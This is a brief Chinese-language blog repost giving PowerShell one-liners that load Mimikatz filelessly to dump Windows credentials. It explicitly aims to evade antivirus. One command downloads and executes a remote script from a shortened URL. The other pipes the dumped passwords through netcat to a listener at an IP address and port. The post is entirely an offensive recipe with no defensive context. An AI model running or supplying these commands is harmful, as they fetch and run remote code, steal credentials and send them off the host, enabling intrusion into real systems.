powershell加载mimikatz 抓密码 (无文件,躲过杀软,可以nc回显)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" 

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds" | nc 192.168.1.1 4444 

猜你喜欢

转载自blog.csdn.net/xiaoziabc/article/details/81147874
今日推荐